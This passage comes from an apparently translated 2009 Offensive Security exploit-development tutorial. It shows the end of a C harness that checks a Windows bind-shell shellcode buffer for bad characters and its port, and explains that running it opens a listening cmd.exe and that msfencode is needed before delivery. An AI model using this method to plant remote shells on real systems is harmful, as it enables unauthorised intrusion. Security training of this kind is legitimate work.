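    size_t hits = count_bad_chars(buf, len, bad, sizeof bad, &first);
    printf("length: %zu bytes\n", len);
    printf("bad chars (00/0a/0d): %zu, first at offset %zu\n", hits, first);
    printf("embedded LPORT: %d\n", embedded_bind_port(buf, len));
    return 0;
}
```

Compiled on Linux with `cc -std=c99 harness.c`, the program reports 341 bytes, 15 bad characters with the first NUL at offset 3 (the displacement of the initial call), and an embedded port of 1234, which is exactly what LPORT=1234 should produce; if the port check ever fails after changing LPORT, the wrong buffer was pasted. Only on a Windows test box does calling run_shellcode() make sense, and it leaves a listening cmd.exe on that port.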


We now have our fully customized shellcode, ready to be dropped into any exploit. One thing to keep in mind: this is the inline (single-stage) payload and it is unencoded, so the listing contains NUL bytes (the call at offset 1 encodes as \xe8\x89\x00\x00\x00). If the target's input path stops at a NUL, or rejects other bad characters, the buffer still needs a pass through msfencode before it will survive delivery.


© Offensive Security 2009

Original from www.offensive-security.com
Translated by cbk999